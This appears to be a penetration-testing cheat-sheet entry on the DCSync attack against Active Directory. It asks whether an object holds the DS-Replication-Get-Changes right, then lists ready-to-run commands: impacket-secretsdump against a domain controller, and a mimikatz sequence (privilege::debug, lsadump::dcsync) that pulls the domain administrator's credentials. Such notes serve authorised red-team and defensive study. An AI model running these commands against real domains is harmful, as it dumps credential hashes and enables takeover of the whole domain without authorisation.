DCSync

Identify


Do you control an object that has been granted the DS-Replication-Get-Changes extended right?

Exploit


impacket-secretsdump 'domain.local'/'<user>':'<pass>'@'<DC0IP>'

From Windows:

runas /netonly /user:DOMAIN\user powershell
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator